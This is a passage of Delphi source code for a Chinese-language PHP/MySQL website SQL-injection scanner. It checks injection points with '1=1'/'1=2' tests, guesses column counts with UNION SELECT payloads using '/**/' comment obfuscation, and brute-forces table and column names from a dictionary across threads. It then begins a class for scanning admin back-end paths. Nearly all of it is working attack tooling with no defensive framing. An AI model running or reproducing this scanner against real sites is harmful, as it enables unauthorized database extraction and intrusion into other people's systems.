PHP+MYSQL网站注入扫描[16]

入点是否可用。。。');
if (not get(furl,'')) or (not get(furl+'/**/and/**/1=1/*',''))
    or (not get(furl+'/**/and/**/1=2/*','')) then
begin
  fmemo.lines.add('注入点不可用，猜解终止！');
  exit;
end;
//开始猜解字段数目
i:=1;
istr:='1';
fstate :=false;
fmemo.lines.add('');
fmemo.lines.add('开始猜解字段数目。。。');
fmemo.lines.add('');
while not fstate do
begin
  inc(i);
  if i>30 then
  begin
    fmemo.lines.add('最大猜解字段数大于30,猜解终止！');
    fstate :=true;
    exit;
  end;
  istr:=istr+','+inttostr(i);
  injurl :=furl+'/**/and/**/1=1/**/union/**/select/**/'+istr+'/*';
  fmemo.lines.add(injurl);
  if get(injurl,fkeyword) then
  begin
    fstate :=true;
    fmemo.lines.add('');
    fmemo.lines.add('字段数目猜解结束！共找到'+inttostr(i)+'个字段。');
    form1.edtfieldnum.text :=inttostr(i);
    form1.spnum.maxvalue :=i;
    form1.spnum.text :=inttostr(i);
    form1.spfield1.maxvalue :=i;
    form1.spfield2.maxvalue :=i;
    exit;
  end;
end;
end;

constructor scantablethread.create(url,str,keyword:string;memo:tmemo;listview:tlistview);
begin
flistview :=listview;
fmemo :=memo;
furl :=url;
fkeyword :=keyword;
fstr :=str;
freeonterminate := true; // 自动删除
initializecriticalsection(cs); //初始化临界区
//inherited create(furl,fkeyword,fmemo); // 直接运行
inherited create(false);
end;

procedure scantablethread.scantableresult;
begin
with flistview.items.add do
begin
  caption :=inttostr(flistview.items.count);
  subitems.add(fvalue);
end;
end;

//在一个线程内完成表段猜解工作
procedure scantablethread.execute;
var i:integer;
begin
stoped :=false;
with form1 do
begin
  pg1.min :=0;
  pg1.max :=form1.lsbdict.count;
  pg1.step :=1;
  pg1.position :=0;
  pg1.visible :=true;
end;
entercriticalsection(cs); //进入临界区
fmemo.lines.add('');
fmemo.lines.add('开始猜解表段。。。');
fmemo.lines.add('');
for i:=0 to form1.lsbdict.count-1 do
begin
  if stoped then
  begin
    fmemo.lines.add('');
  fmemo.lines.add('表段猜解结束。。。');
  form1.pg1.visible :=false;
  exit;
  end;
  fvalue :=form1.lsbdict.items;
  if fvalue='' then continue;
  injurl :=furl+'/**/and/**/1=1/**/union/**/select/**/'+fstr+'/**/from/**/'+fvalue+'/*';
  fmemo.lines.add(injurl);
  form1.pg1.stepit;
  if get(injurl,fkeyword) then
  begin
    synchronize(scantableresult); //同步
  end;
end;
fmemo.lines.add('');
fmemo.lines.add('表段猜解结束。。。');
form1.pg1.visible :=false;
leavecriticalsection(cs); //退出临界区
sleep(20); // 线程挂起;
end;

//创建多个线程完成字段猜解
constructor scanfieldthread.create(url,str,keyword,table:string;num:integer;memo:tmemo;listview:tlistview);
begin
flistview :=listview;
fmemo :=memo;
furl :=url;
fkeyword :=keyword;
fstr :=str;
ftable :=table;
fnum :=num;
freeonterminate := true; // 自动删除
initializecriticalsection(cs); //初始化临界区
//inherited create(furl,fkeyword,fmemo); // 直接运行
inherited create(false);
end;

procedure scanfieldthread.scanfieldresult;
begin
with flistview.items.add do
begin
  caption :=inttostr(flistview.items.count);
  subitems.add(fvalue);
end;
end;

procedure scanfieldthread.execute;
var
i:integer;
tmpstr:string;
begin
fvalue :=form1.lsbdict.items[fnum];
tmpstr :=stringreplace(fstr,'&fieldname&',fvalue,[rfignorecase]);
injurl:=furl+'/**/and/**/1=1/**/union/**/select/**/'+tmpstr+'/**/from/**/'+ftable+'/*';
entercriticalsection(cs); //进入临界区
fmemo.lines.add(injurl);
if get(injurl,fkeyword) then
begin
  synchronize(scanfieldresult); //同步
end;
leavecriticalsection(cs); //退出临界区
sleep(20); // 线程挂起;
end;

end.


//后台管理扫描线程类
unit unit3;

interface

uses
classes,stdctrls,windows,sysutils,comctrls,wininet;

var
cs:trtlcriticalsection;   //定义全局临界区

type
scanmanagerthread = class(tthread)
private
  tmplbx :tlistbox;
  tmpmemo :tmemo;
  tmpnum :integer;
  tmpurl :string;
  str :string;
  procedure scanresult;
protected
  procedure execute; override;
public
  constructor create(url:string; num: integer;lbx: tlistbox;memo:tmemo);
end;

implementation

uses unit1;

constructor scanmanagerthread.create(url:string; num: integer;lbx: tlistbox;